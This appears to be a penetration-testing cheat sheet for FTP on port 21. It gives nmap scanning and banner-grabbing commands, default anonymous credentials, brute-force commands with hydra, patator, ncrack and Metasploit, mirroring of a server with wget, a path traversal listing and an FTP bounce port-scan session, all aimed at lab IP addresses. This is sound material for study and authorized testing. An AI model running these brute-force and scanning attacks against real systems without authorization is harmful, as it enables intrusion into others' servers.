FTP ( 21 )

Nodes

• FTP-C

Resources

• FTP Deep Dive
  • By jscapeus : https://www.youtube.com/watch?v=8X-DZUIZa94
• Exploitation
  • By Hacking articles : https://www.hackingarticles.in/ftp-penetration-testing-on-ubuntu-port-21/

Cheat sheet

• By secybr : https://secybr.com/posts/ftp-pentesting-best-practices/#directory-traversal-attack
• By verylazytech : https://www.verylazytech.com/network-pentesting/ftp-port-21
• By Thehacker.recipes : https://www.thehacker.recipes/infra/protocols/ftp
• Commands FTP list : https://web.archive.org/web/20230326204635/https://www.smartfile.com/blog/the-ultimate-ftp-commands-list/

Commands

• Scaning

      nmap -Pn --disable-arp-ping -sV 192.168.99.24 -p21

• Banner Grabbing

    nmap -Pn --disable-arp-ping -sV 192.168.99.24 -p21 --script=banner
    nc -nv 192.168.99.24 21  
    telnet 192.168.99.24 21
    openssl s_client -connect 192.168.99.24:21 -starttls ftp

• Brute Forcing

       #Manual Anonymous Login Combos
       anonymous : anonymous
       anonymous :
       ftp : ftp
       
       msf > use auxiliary/scanner/ftp/anonymous
       msf > use auxiliary/scanner/ftp/ftp_login
       
       nmap --script=ftp-anon -p21 192.168.99.24
       nmap --script ftp-brute -p21 192.168.99.24
       
       patator ftp_login host=192.168.99.24 user=FILE0 password=FILE1 0=users  1=pass.txt tls=1 -x ignore:mesg='Login incorrect.' -x ignore,reset,retry:code=500 # SSL
       hydra -t 2 -L users -P pass.txt 192.168.99.24 -s 21 ftps #SSL         
       hydra -L users -P pass.txt 192.168.99.24 ftp -V
       
       ncrack -v -U users -P pass.txt ftp://192.168.99.24:21
       

• Connecting with FTP client

  ftp ftp://ubuntu:123@192.168.99.24 # Username & Password 
  ftp ftp://anonymous:anonymous@192.168.99.24 # Anonymous 
   
  lftp
  lftp :~> set ftp:ssl-force true
  lftp :~> set ssl:verify-certificate no
  lftp :~> connect 192.168.99.24
  lftp 192.168.99.24:~> login ubuntu 123
  lftp ubuntu@192.168.99.24:~> ls

• Mounting

  apt-get install curlftpfs
  curlftpfs ubuntu:123@192.168.99.24 my_ftp # If SSL is enabled -o ssl,no_verify_peer,no_verify_hostname
  curlftpfs -o allow_other ftp-user:ftp-pass@my-ftp-location.local /mnt/my_ftp/ # To allow other users
  fusermount -u my_ftp # unmount     

• Downloading

  wget -m --no-passive ftps://ubuntu:123@192.168.99.24/ --no-check-certificate     -reject '.vboxclient*'

Attacks

• Path Traversal

  ftp ftp://ubuntu:123@192.168.99.24
  ftp> ls ../../../../
  -rwxrwxrwx   1 ftp      ftp            0 Sep 23  2015 AUTOEXEC.BAT
  -rw-rw-rw-   1 ftp      ftp            0 Sep 23  2015 CONFIG.SYS
  .....
  226 File sent ok

• FTP Bounce

  nmap -sV --script ftp-bounce -p21 10.10.x.x 
  nmap -v -p 21,22,445,80,443 -b username:password@172.19.0.100 192.168.0.1/24
   
  msf > use   auxiliary/scanner/portscan/ftpbounce
   
  SER A
  331 Username okay, awaiting password
  PASS A
  230 User logged in, proceed
  PORT 172,19,0,100,0,1234
  200 The requested action has been successfully completed 
  LIST
  150 File status okay; about to open data connection // We understood port 1234 is open
  226 Closing data connection 
  PORT 172,19,0,100,0,4444
  200 The requested action has been successfully completed 
  LIST
  425 No connection established // We understood port 4444 is closed

  sequenceDiagram
      participant Attacker
      participant FTP server
      participant Target
      Attacker->>FTP server: PORT 172,19,0,100,0,1234
      FTP server-->>Target:  SYN+Port 1234
      Target-->> FTP server: SYN/ACK
      FTP server-->> Target: ACK
      FTP server ->> Attacker: 226 Transfer Complete
  

• Random

sequenceDiagram
    participant User
    participant FTP Server
    User-->> FTP Server: Command Channel ( 21 ) 
    FTP Server -->> User: Data Transmittion (20)

Passive

As hinted earlier, passive mode FTP is the more recent data connection mode. While older systems only support active mode, modern GUI-based or command-line FTP clients also support passive mode. Let’s now go over the simplified steps for establishing passive connections.

sequenceDiagram
    participant User
    participant FTP Server
    User-->> FTP Server: Command Channel ( 21 ) 
    User-->> FTP Server : Data Transmittion (Random)

WARNING

File upload (PUT FileName.exe) or download (GET FileName.txt; mget FileName.txt) operations can be performed after login. In order for the file to be loaded to be added without being corrupted, the mode must be changed with the “binary” commands if this file is in binary format, and “ascii” commands if it is in ASCII format.

TIP

In addition, there is a file called /etc/ftpusers that we also need to pay attention to, as this file is used to deny certain users access to the FTP service.